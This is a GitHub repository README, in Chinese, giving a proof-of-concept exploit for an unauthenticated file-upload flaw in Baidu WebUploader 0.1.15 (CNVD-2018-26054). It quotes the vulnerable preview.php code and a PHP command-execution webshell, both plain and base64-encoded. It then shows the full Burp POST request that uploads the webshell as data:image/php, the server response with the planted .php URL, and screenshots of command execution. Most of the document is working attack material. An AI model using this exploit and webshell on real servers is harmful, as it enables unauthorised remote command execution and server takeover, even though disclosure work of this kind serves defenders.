├── README.md ├── burpsuite.jpg ├── cmd.jpg ├── phpinfo.jpg └── webuploader.jpg /README.md: -------------------------------------------------------------------------------- 1 | # webuploader-v-0.1.15 组件存在文件上传漏洞(未授权) 2 | 3 | #### 简介:百度WebUploader组件存在文件上传漏洞。该漏洞是由于WebUploader组件上传页面对文件类型或文件扩展名过滤不严所致,攻击者可利用漏洞直接上传或简单绕过限制上传脚本文件,执行系统命令,获取网站服务器权限。 4 | 5 | #### server/preview.php 6 | ``` 7 | if (preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)) { 8 | 9 | $previewUrl = sprintf( 10 | "%s://%s%s", 11 | isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https' : 'http', 12 | $_SERVER['HTTP_HOST'], 13 | $_SERVER['REQUEST_URI'] 14 | ); 15 | $previewUrl = str_replace("preview.php", "", $previewUrl); 16 | 17 | 18 | $base64 = $matches[2]; 19 | $type = $matches[1]; 20 | if ($type === 'jpeg') { 21 | $type = 'jpg'; 22 | } 23 | 24 | $filename = md5($base64).".$type"; 25 | $filePath = $DIR.DIRECTORY_SEPARATOR.$filename; 26 | 27 | if (file_exists($filePath)) { 28 | die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}'); 29 | } else { 30 | $data = base64_decode($base64); 31 | file_put_contents($filePath, $data); 32 | die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}'); 33 | } 34 | ``` 35 | ## 0x00 python usage 36 | `python exp.py http://192.168.2.18/webuploader-0.1.15-Demo/server/preview.php` 37 | 38 | ![](./webuploader.jpg) 39 | 40 | #### php_webshell 41 | 42 | ``` 43 | "; 46 | $cmd = ($_REQUEST['cmd']); 47 | system($cmd); 48 | echo ""; 49 | die; 50 | } 51 | phpinfo(); 52 | ?> 53 | ``` 54 | 55 | #### base64 encode 56 | 57 | ``` 58 | PD9waHANCiAgICBpZihpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSl7DQogICAgICAgICAgICBlY2hvICI8cHJlPiI7DQogICAgICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOw0KICAgICAgICAgICAgc3lzdGVtKCRjbWQpOw0KICAgICAgICAgICAgZWNobyAiPC9wcmU+IjsNCiAgICAgICAgICAgIGRpZTsNCiAgICB9DQogICAgcGhwaW5mbygpOw0KPz4= 59 | ``` 60 | 61 | ## 0x01 POST upload php webshell 62 | 63 | `http://192.168.2.18/webuploader-0.1.15-Demo/server/preview.php` 64 | ![](./burpsuite.jpg) 65 | #### BurpSuite Requests 66 | ``` 67 | POST /webuploader-0.1.15-Demo/server/preview.php HTTP/1.1 68 | Host: 192.168.2.18 69 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 70 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 71 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 72 | Accept-Encoding: gzip, deflate 73 | Content-Type: application/x-www-form-urlencoded 74 | Content-Length: 298 75 | X-Forwarded-For: 127.0.0.1 76 | Connection: close 77 | Upgrade-Insecure-Requests: 1 78 | Cache-Control: max-age=0 79 | 80 | data:image/php;base64,PD9waHANCiAgICBpZihpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSl7DQogICAgICAgICAgICBlY2hvICI8cHJlPiI7DQogICAgICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOw0KICAgICAgICAgICAgc3lzdGVtKCRjbWQpOw0KICAgICAgICAgICAgZWNobyAiPC9wcmU+IjsNCiAgICAgICAgICAgIGRpZTsNCiAgICB9DQogICAgcGhwaW5mbygpOw0KPz4= 81 | 82 | ``` 83 | #### BurpSuite Response 84 | ``` 85 | HTTP/1.1 200 OK 86 | Date: Fri, 06 Sep 2019 05:40:48 GMT 87 | Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a 88 | X-Powered-By: PHP/5.5.9 89 | Connection: close 90 | Content-Type: text/html 91 | Content-Length: 142 92 | 93 | {"jsonrpc" : "2.0", "result" : "http://192.168.2.18/webuploader-0.1.15-Demo/server/preview/fe8db86134e6505da6f3c4a112b0bad7.php", "id" : "id"} 94 | ``` 95 | 96 | #### webshell 97 | `http://192.168.2.18/webuploader-0.1.15-Demo/server/preview/fe8db86134e6505da6f3c4a112b0bad7.php` 98 | 99 | ![](./phpinfo.jpg) 100 | 101 | ![](./cmd.jpg) 102 | 103 | ### 参考链接 104 | 105 | https://github.com/teambition/webuploader/releases 106 | 107 | https://www.cnvd.org.cn/flaw/show/CNVD-2018-26054 108 | 109 | payload form 圈子 110 | -------------------------------------------------------------------------------- /burpsuite.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/webuploader-0.1.15-Demo/ea33f816df312407e816b1c90101fea642b061a5/burpsuite.jpg -------------------------------------------------------------------------------- /cmd.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/webuploader-0.1.15-Demo/ea33f816df312407e816b1c90101fea642b061a5/cmd.jpg -------------------------------------------------------------------------------- /phpinfo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/webuploader-0.1.15-Demo/ea33f816df312407e816b1c90101fea642b061a5/phpinfo.jpg -------------------------------------------------------------------------------- /webuploader.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/webuploader-0.1.15-Demo/ea33f816df312407e816b1c90101fea642b061a5/webuploader.jpg --------------------------------------------------------------------------------